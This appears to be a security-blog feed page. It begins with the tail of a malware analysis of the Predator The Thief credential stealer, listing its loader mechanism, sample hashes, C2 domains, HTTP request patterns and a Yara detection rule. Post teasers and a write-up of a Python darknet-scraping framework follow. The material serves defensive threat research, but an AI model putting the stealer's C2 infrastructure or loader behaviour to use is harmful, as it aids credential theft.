This is basic and simple, but enough to slow down review of the strings. At least it’s really easy to uncover, so it doesn’t matter much.
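Decoding the example above is a one-liner; in this particular string the pushed bytes are already plain ASCII, and the leading 0x04 byte is what shows up as the dot in the decoded string:

blob = bytes.fromhex("046170692F676174652E6765743F70313D")
print(blob)               # b'\x04api/gate.get?p1='
print(blob[1:].decode())  # api/gate.get?p1=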

This tweak is by far the reason why the code is much longer than in v2.3.5.

Loader

Not seen before (as far as I saw), 2.3.7 seems to integrate a loader feature to push another payload onto the victim machine, easily recognizable by the corresponding GET request:

/api/download.get

This API request lets the malware retrieve a URL in text format. The payload is then downloaded, saved to disk and executed with the help of ShellExecuteA.

Loader

There are also some other tweaks, but it’s unnecessary to detail them in this review; I leave that task to you if you are curious 🙂

IoC

v2.3.5

  • 299f83d5a35f17aa97d40db667a52dcc | Sample Packed
  • 3cb386716d7b90b4dca1610afbd5b146 | Sample Unpacked
  • kent-adam.myjino.ru | C2 Domain

v2.3.7

  •  cbcc48fe0fa0fd30cb4c088fae582118 | Sample Unpacked
  •  denbaliberdin.myjino.ru | C2 Domain

HTTP Patterns

  • GET    –   /api/info.get
  • POST  –  /api//gate.get?p1=X&p2=X&p3=X&p4=X&p5=X&p6=X&p7=X
  • GET    –  /api/download.get

MITRE ATT&CK

v2.3.5

  • Discovery – Peripheral Device Discovery
  • Discovery – System Information Discovery
  • Discovery – System Time Discovery
  • Discovery – Query Registry
  • Credential Access – Credentials in Files
  • Exfiltration – Data Compressed

v2.3.7

  • Discovery – Peripheral Device Discovery
  • Discovery – System Information Discovery
  • Discovery – System Time Discovery
  • Discovery – Query Registry
  • Credential Access – Credentials in Files
  • Exfiltration – Data Compressed
  • Execution –  Execution through API

Author / Threat Actor

  • Alexuiop1337

Yara Rule

rule Predator_The_Thief : Predator_The_Thief {
    meta:
        description = "Yara rule for Predator The Thief v2.3.5 & +"
        author = "Fumik0_"
        date = "2018/10/12"
        update = "2018/12/19"

    strings:
        $mz = { 4D 5A }

        // V2
        $hex1 = { BF 00 00 40 06 } 
        $hex2 = { C6 04 31 6B }
        $hex3 = { C6 04 31 63 }
        $hex4 = { C6 04 31 75 }
        $hex5 = { C6 04 31 66 }
 
        $s1 = "sqlite_" ascii wide
 
        // V3
        $x1 = { C6 84 24 ?? ?? 00 00 8C } 
        $x2 = { C6 84 24 ?? ?? 00 00 1A }  
        $x3 = { C6 84 24 ?? ?? 00 00 D4 } 
        $x4 = { C6 84 24 ?? ?? 00 00 03 }  
        $x5 = { C6 84 24 ?? ?? 00 00 B4 } 
        $x6 = { C6 84 24 ?? ?? 00 00 80 }
 
    condition:
        $mz at 0 and 
        ( ( all of ($hex*) and all of ($s*) ) or (all of ($x*)))
}

 

Recommendations

  • Always run suspicious stuff inside a VM, and be sure to install plenty of hypervisor-related components (like guest-addition tools) to trigger as many anti-VM detections as possible and make the malware close itself. When you are done with your activities, stop the VM and restore it to a specific clean snapshot.
  • Avoid storing files in predictable paths (Desktop, Documents, Downloads); put them somewhere uncommon.
  • Avoid cracks and other stupid fake hacks; stealers usually ride the current game trends (especially these days with Fortnite…).
  • Use containers for the software you run; this will reduce the risk of data theft.
  • Flush your browser after each visit, and never save your passwords directly in your browser or use auto-fill features.
  • Don’t use the same password for all your websites (use 2FA where possible); we are in 2018, and sadly this is still common practice.
  • Make some noise with your data; that will force attackers to dig for accurate values among the junk information.
  • Use password vault software.
  • Troll/Not Troll: Learn Russian and put your keyboard in Cyrillic 🙂

Conclusion

Stealers are not sophisticated malware, but they are effective enough to cause irreversible damage to victims. Email accounts and other credentials are more and more impactful, and this will only get worse over the years. Account-management habits must change to limit this kind of scenario. Awareness and good practices are the keys; a simple security software solution will not solve everything.

Well, I’ve had enough work for now; it’s time to sleep a little…

Himouto Habits

#HappyHunting

Update 2018-10-23: the Yara rule now also works for v3.

Windows 10 x86/wow64 Userland heap

Introduction Hi all, Over the course of the past few weeks, I received a number of "emergency" calls from some relatives, asking me to look at their computer because "things were broken", "things looked different" and "I think my computer got hacked".  I quickly realized that their computers got upgraded to Windows 10. We […]

The post Windows 10 x86/wow64 Userland heap first appeared on Corelan Cybersecurity Research.

Crypto in the box, stone age edition

Introduction First of all, Happy New Year to everyone! I hope 2016 will be a fantastic and healthy year, filled with fun, joy, energy, and lots of pleasant surprises. I remember when all of my data would fit on a single floppy disk. 10 times. The first laptops looked like (and felt like) mainframes on […]

The post Crypto in the box, stone age edition first appeared on Corelan Cybersecurity Research.

Tivoli Madness

By: voidsec

TL; DR: this blog post serves as an advisory for both: CVE-2020-28054: An Authorization Bypass vulnerability affecting JamoDat – TSMManager Collector v. <= 6.5.0.21 A Stack Based Buffer Overflow affecting IBM Tivoli Storage Manager – ITSM Administrator Client Command Line Administrative Interface (dsmadmc.exe) Version 5, Release 2, Level 0.1. Unfortunately, after I had one of […]

The post Tivoli Madness appeared first on VoidSec.

Hunting Onions – A Framework for Simple Darknet Analysis

By: Joshua

Sevro Security

One of the things I spend a lot of time doing is researching the current threat landscape. I dedicate a lot of time to pulling samples from VirusTotal, reversing, analyzing, and searching for known/unknown IOCs everywhere I can in order to properly mimic a threat actor. One of the places I search happens to be Tor (AKA the darknet). How I connect to Tor varies, and this post is not about how to stay safe and avoid data leakage. Rather, it demonstrates a novel approach to obtaining .onion addresses and analyzing them in a safe and efficient manner.

TL;DR: A full listing of classes and functions are detailed within the Github Wiki.


How Onion Hunter Works

NOTE: Onion Hunter does not download images, malware, full site source code, etc. This is to protect the user and the system running the analysis. There are plenty of bad things that can easily get you into trouble, and for that reason alone, only the HTML of the page in question is analyzed and nothing more.


Onion-Hunter is a Python3 based framework that analyzes Onion site source code for user defined keywords and stores relevant data to a SQLite3 backend. Currently, the framework utilizes several sources to aggregate Onion addresses:

  • Reddit subreddits: A predefined set of subreddits, populated within config.py, is scraped for any Onion addresses.
  • Tor Deep Paste: This has turned out to be a very good source.
  • Fresh Onions Sources: Each onion address is analyzed to determine if it’s a fresh onion source (i.e., contains new/mapped onions) and if so, is saved to the FRESH_ONION_SOURCES table.
  • Additional_onions.txt: Any tertiary onion address, that is any address found that is not immediately analyzed, is saved to docs/additional_onions.txt for later analysis.

A researcher can also analyze an individual address, or a text file filled with Onion addresses, if they happen to come upon something interesting that warrants analysis and categorization.

Once valid .Onion addresses have been found, they’re analyzed by issuing a GET request to each address and searching the index source (HTML) for keywords pre-defined by the researcher.
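Conceptually, the per-address check looks like the sketch below. This is my own minimal version, not the framework’s code; it assumes a local Tor SOCKS proxy listening on 127.0.0.1:9050 and requests installed with SOCKS support (requests[socks]).

import requests

TOR_PROXIES = {
    "http": "socks5h://127.0.0.1:9050",
    "https": "socks5h://127.0.0.1:9050",
}

def keyword_hits(onion_url, keywords):
    # Fetch only the index HTML through Tor and count keyword occurrences.
    html = requests.get(onion_url, proxies=TOR_PROXIES, timeout=60).text.lower()
    return {kw: html.count(kw.lower()) for kw in keywords}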

Onion Hunting Process

The Database

A SQLite3 backend is used to maintain records of all analyzed Onion addresses, as well as a record of all Onions that have been categorized as probable Fresh Onion Domains. There are a total of three (3) tables:

  1. ONIONS – Contains all Onion addresses observed and is by far the most interesting table for analysis.
  2. FRESH_ONION_SOURCES – Any onion address that has 50+ unique addresses listed on its front page and also includes fresh-onion keywords is categorized as a probable Fresh Onion Domain and saved to this table.
  3. KNOWN_ONIONS – This table is currently unused. It was designed for reporting purposes: if you want to conduct analysis on weekly/monthly trends (for example), attributes of previously analyzed Onions can be added to this table to avoid duplication in reporting.

CREATE TABLE ONIONS
(ID INTEGER PRIMARY KEY AUTOINCREMENT,
DATE_FOUND TEXT NOT NULL,
DOMAIN_SOURCE TEXT NOT NULL,
URI TEXT NOT NULL,
URI_TITLE TEXT,
DOMAIN_HASH TEXT NOT NULL,
KEYWORD_MATCHES TEXT,
KEYWORD_MATCHES_SUM INT,
INDEX_SOURCE TEXT NOT NULL);

CREATE TABLE FRESH_ONION_SOURCES
(ID INTEGER PRIMARY KEY AUTOINCREMENT,
URI TEXT NOT NULL,
DOMAIN_HASH TEXT NOT NULL,
FOREIGN KEY (DOMAIN_HASH) REFERENCES ONIONS (DOMAIN_HASH));

CREATE TABLE KNOWN_ONIONS
(ID INTEGER PRIMARY KEY AUTOINCREMENT,
DOMAIN_HASH TEXT NOT NULL,
DATE_REPORTED TEXT,
REPORTED INT NOT NULL,
FOREIGN KEY (DOMAIN_HASH) REFERENCES ONIONS (DOMAIN_HASH));
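For reference, inserting an analyzed onion into the ONIONS table defined above is a straightforward sqlite3 call. This is my own usage sketch, not framework code; the SHA-256 choice for DOMAIN_HASH is an assumption.

import hashlib
import sqlite3
from datetime import date

def record_onion(db_path, uri, source, title, keyword_matches, index_html):
    # DOMAIN_HASH here is a SHA-256 of the URI (the framework may hash differently).
    domain_hash = hashlib.sha256(uri.encode()).hexdigest()
    with sqlite3.connect(db_path) as con:
        con.execute(
            "INSERT INTO ONIONS (DATE_FOUND, DOMAIN_SOURCE, URI, URI_TITLE, "
            "DOMAIN_HASH, KEYWORD_MATCHES, KEYWORD_MATCHES_SUM, INDEX_SOURCE) "
            "VALUES (?, ?, ?, ?, ?, ?, ?, ?)",
            (date.today().isoformat(), source, uri, title, domain_hash,
             ",".join(keyword_matches), len(keyword_matches), index_html),
        )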

An example of what the data looks like within the ONIONS table can be seen in the image below. For simply viewing the data, I like to use DB Browser for SQLite. However, all heavy operations should be done in code, as this application can be very clunky.

Viewing the ONIONS table within DB Browser

User Configuration

As stated above, the only method of domain/site analysis is a simple keyword search. A user must supply the following within src/config.py:

class configuration:

    def __init__(self):
        # Reddit API Variables
        self.r_username = ""
        self.r_password = ""
        self.r_client_id = ""
        self.r_client_secret = ""
        self.r_user_agent = ""

        # Reddit SubReddits to Search:
        self.sub_reddits = ["onions", "deepweb", "darknet", "tor", "conspiracy", "privacy", "vpn", "deepwebintel",
                            "emailprivacy", "drugs", "blackhat", "HowToHack", "netsec", "hacking",
                            "blackhatunderground", "blackhats", "blackhatting", "blackhatexploits",
                            "reverseengineering"]

        # Keywords to Search each Onions Address for.
        ## Searches the .onion source code retrieved via an HTTP GET request.
        self.keywords = ["Hacker", "Flawwedammy"]

Improvements

There are a lot of improvements that can be made to the current version, and I intend to make some of these changes in 2020. For example, I would like to utilize the DuckDuckGo API as well as Reddit to start the initial searching. There may also be reliable sources that keep tabs on Fresh Onion databases active on Tor. These information sources would be more reliable going forward.

Other improvements such as database optimization, site categorization, and user-defined analysis techniques are slotted as well.


